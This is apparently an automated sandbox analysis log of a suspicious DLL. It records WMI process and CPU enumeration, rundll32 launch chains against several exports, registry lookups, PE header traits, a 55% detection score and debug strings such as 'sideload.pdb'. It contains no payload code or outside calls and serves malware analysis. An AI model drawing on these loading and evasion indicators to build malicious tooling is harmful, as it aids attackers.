    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain
    Source: 8N8j6QojHn.dllReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5860 -s 428
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6728 -s 428
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_pathJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_pathJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: 8N8j6QojHn.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: 8N8j6QojHn.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: 8N8j6QojHn.dllStatic file information: File size 3645790 > 1048576
    Source: 8N8j6QojHn.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2db200
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 8N8j6QojHn.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: 8N8j6QojHn.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: sspicli.pdbecurityToolsz source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: crypt32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32full.pdbut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"Z source: rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mswsock.pdbDSut source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: win32u.pdbexeName8# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdb source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dll
    Source: Binary string: tdll.pdb"},{"type":"a source: rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksize source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rpcrt4.pdbternetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ile":"kernelbase.pdbL source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools$ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbor source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wbemprox.pdbr.exessName source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: cryptbase.pdburityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEeInfo[ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: shcore.pdbedrSizenfo0cf source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: K7RTScan.exeadvapi32.pdb$M4 source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: kernel32.pdbrnetSecurity source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcp_win.pdbor source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"R source: rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: "secur32.pdb"},{"type":"symbolic","name":"C:\\Windows\\SYSTEM32\\CRYPTBASE.DLL","arch":null,"image_addr":"0x7ffd source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.dll9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: gdi32.pdb/SecurityToolsd source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcryptprimitives.pdbols source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: nsi.pdb2% source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
